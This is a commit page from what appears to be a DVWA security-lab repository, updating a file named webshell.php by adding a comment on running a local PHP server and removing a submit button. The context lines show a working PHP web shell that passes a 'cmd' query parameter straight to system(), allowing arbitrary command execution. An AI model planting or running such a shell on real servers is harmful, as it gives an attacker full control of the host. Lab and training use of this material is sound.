summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorjerome <jerome@xlinfo.fr>2023-12-26 17:06:11 +0100
committerjerome <jerome@xlinfo.fr>2023-12-26 17:06:11 +0100
commit6b5750142275e138ab8d7d981d14531aa433a314 (patch)
tree50a36f7fce10bf9c69fb057ba90a2ca7451b59ce
parent067b18f276827f1e28bd35d7b1e0f27fbc1ce3bd (diff)
downloaddvwa-6b5750142275e138ab8d7d981d14531aa433a314.tar.gz
dvwa-6b5750142275e138ab8d7d981d14531aa433a314.zip
update webshell
-rw-r--r--webshell.php2
1 files changed, 1 insertions, 1 deletions
diff --git a/webshell.php b/webshell.php
index 679bb7a..dbb759d 100644
--- a/webshell.php
+++ b/webshell.php
@@ -1,4 +1,5 @@
<!DOCTYPE html>
+<!-- Pour lancer le serveur : php -S localhost 8000 -->
<html>
<head>
<title>Web shell</title>
@@ -10,7 +11,6 @@
</p>
<form>
<input type="text" name="cmd" autofocus />
-<input type="submit" />
</form>
<pre>
<?php if (isset($_GET['cmd'])) system($_GET['cmd']) ?>